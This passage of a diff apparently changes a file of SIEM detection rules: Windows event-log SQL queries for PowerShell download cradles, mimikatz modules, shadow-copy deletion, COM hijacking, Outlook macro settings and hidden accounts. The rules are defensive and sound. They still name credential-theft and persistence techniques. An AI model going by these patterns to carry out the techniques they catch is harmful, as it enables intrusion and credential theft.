ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.002" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", - "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", - "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE 